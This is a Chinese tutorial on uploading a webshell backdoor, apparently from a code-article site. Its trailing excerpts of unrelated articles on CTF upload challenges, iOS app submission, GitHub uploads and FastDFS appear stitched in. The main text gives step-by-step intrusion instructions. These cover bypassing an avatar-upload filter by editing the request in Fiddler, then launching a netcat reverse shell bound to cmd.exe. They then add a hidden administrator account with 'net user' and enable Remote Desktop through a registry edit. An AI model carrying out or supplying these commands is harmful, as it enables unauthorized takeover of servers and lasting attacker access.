webshell后门上传流程

1、将webshell.php的后缀名改成jpg等图片格式,即web.jpg。

2、打开相应网址,注册好账号后选择上传头像将web.jpg上传期间运行fiddler并设置断点,切换到raw界面,等到其提示相应请求代码后,将其代码段中第二个含有上传图片名称的代码改成web.php,之后继续响应请求。

3、此时已经成功把后门程序上传,将服务器反馈的代码中含有路径的部分复制粘贴到网站URL后面(注意将?php覆盖)刷新网页。

4、然后输入相应密码进入控制服务器端,将本机的nc.exe(netcut)上载到其C盘根目录下。

5、而后在自己本机打开cmd命令窗口找到nc.exe所在的目录并运行

6、这时已经进入nc.exe,在Cmd line:后输入nc -vv -l -p 8080进行监听

7、在控制服务器端选择Execute Command窗口,输入‘c:\nc.exe -vv [自身ip 端口] -e cmd.exe‘启动nc(绑定服务器端主机的cmd.exe在本机的相应端口)

8、然后就可以添加自己的账号作为管理员了,具体操作是:

(1) net user hacker 3836546 /add (添加用户)

(2) net user localgroup administrators test /add (添加到管理员组)

9、写入注册表:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

(win2k,winxp,win2k3下开启远程桌面,不用重启)

10、有时还需要修改3389端口

[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\Wds\Repwd\Tds\Tcp]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentContro1Set\Control\TenninalServer\WinStations\RDP-Tcp]

11、完成上述流程后,你就可以进入服务器端的主机进行操作

时间: 2024-10-16 14:02:36

webshell后门上传流程的相关文章

1.5 webshell文件上传漏洞分析溯源(1~4)

webshell文件上传漏洞分析溯源(第一题) 我们先来看基础页面: 先上传1.php ---->   ,好吧意料之中 上传1.png  ---->   我们查看页面元素 ----->   ,也没有前端验证 看来只能用burp抓包来改包绕过,我们修改1.php  ---->   1.php .png ,然后上传抓包改包 0x20 -----> 0x00 webshell文件上传漏洞分析溯源(第一题) 我们先来看基础页面: 先上传1.php ---->   ,好吧意料之中

构建新版本APP上传流程

//既然是构建新版本的 APP,那么所有的证书都是已经存在了的,因此以下不再重复描述证书申请过程,如有需要请自行 Google 相关流程. 1)更改版本号: 2)去掉工程内的全局断点,同时关闭僵尸调试模式,将所有的 debug 改为 release,这样就去掉系统帮助在写代码期间添加的帮助调试的代码. 3)接下来将模拟器置为通用型设备,如图: 4)打包程序: 5)导出 ipa 文件: 6)先打开Application Loader,具体位置导航栏左上角 Xcode ->Open Develope

分布式文件系统 fastdfs 源码分析 之 文件上传流程分析

fastdfs是一个轻量级的分布式文件系统,主要由 tracker server, storage server 以及client组成,这里主要涉及两点 : 1)客户端上传文件流程和协议分析 2)实现一个简单的文件上传函数 一: 文件上传的基本流程 fastdfs中上传一个文件,主要涉及以下几个步骤: 1)上传连接请求,客户端会向tracker server发出上传文件的请求 2)tracker收到请求后,返回storage server的ip和端口 3)客户端连接storage,并且上传文件

.user.ini后门/上传黑名单绕过

.user.ini文件自动包含木马文件(后门): 前提条件: 1.正常的php文件 2..user.ini文件 3.muma.gif图片马 利用步骤: 1.创建一个文件夹test,大家可能会有疑问,为什么还要再创建一个文件夹test,其实就是如果根目录本身就有user.ini的话,那么就会有影响,同样的会层层往上层目录寻找user.ini 2.test.php 内容为<?php echo 1;?> 3.muma.gif内容为<?php if(@$_GET['shell']=='test'

iOS 程序上传流程

程序上传步骤: 1.登录账户,点击Manage Your Apps 2.点击Add New App 3.注册Bundle ID,点击蓝色的here 4.进入了注册页面,首先要填写App ID的一个描述,这个随意填了,只要你能记住(建议填个有特征的,比如”AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,后面找起来方便!虽然有点不厚道~) 5.接下来就要填Bundle ID了,这个很重要,要和Xcode里面的Bundle identifier内容一致,比如我的是www.l

6. webshell文件上传分析溯源

这道题也是借助大佬的帮助才成功,具体我们来看: 既然人家扫描发现后台目录有文件上传,我们也不能落后,顺便拿出了传说中的御剑,并进行一波扫描: 发现了几个比较有用的目录,特别是upload1.php跟upload2.php两个上传页面 我们先来访问upload1.php: 点击确定后是upload2.php,竟然是一片空白 不过中间好像有个上传的页面一闪而过,我们用burp抓包,来一页一页看页面 果然有这个页面,但是抓包的cookie引起了我们的注意: Cookie: uploadmd5=veri

gitHub上传流程

github上传文件的步骤: 第一步:安装 ,下载安装包,就一直下一步,什么都不用改动,接下来,我悄悄告诉你 第二步:打开github网址 https://github.com/,输入你的用户名/邮箱和密码,你会进行到这个页面 点击红框框出现接下的界面 第三步:你会进入到这个页面 点击setting 选中之后页面会闪一下 第四步:当你完成了第一步的安装之后,在桌面,鼠标右击, 点击 Git Bash Here,接下来你就进入那无处安放的小黑本了, 开始输入那该死的命令 1.mkdir 目录名,

墨者学院WebShell文件上传分析溯源(第2题)Write

今天看文章看到一道比较有意思的题,复现并记录一下,友情提示,这个靶场经常经常经常出问题,如果发现路径无法访问等问题,重启解决就好~ 寻找上传文件 访问提示后台,访问admin/upload.php会显示没有权限,并有一个upload1.php页面一闪而过,随后跳转到upload2.php,用burp抓包,得到上传页面 确定上传路径 上传之后只会显示上传路径,扫描目录也没有找到上传的文件,通过抓取upload1.php页面,发现返回了源码,现在已知处理上传的文件为upload_file.php 通

iOS 开发 -----公司测试打包上传流程

打包iOS应用程序 如果想要将做的iOS应用程序安装到自己的iOS设备上测试.或者安装到别人的iOS设备上,或者想发布到App Store中,先要给应用签名.签名就要有证书,这就需要申请证书的过程了. 把自己的应用程序安装到设备中,主要有一下几种方式: 把iOS设备与电脑连接起来,如果Xcode中已经添加了包含这个设备的Profile文件且在工程中已经选择了该文件,那么在Xcode左上角便可以选择这个设备,之后点击RUN,程序就被安装在这个iOS设备中了.这个主要用于在真机上测试程序. 使用Xc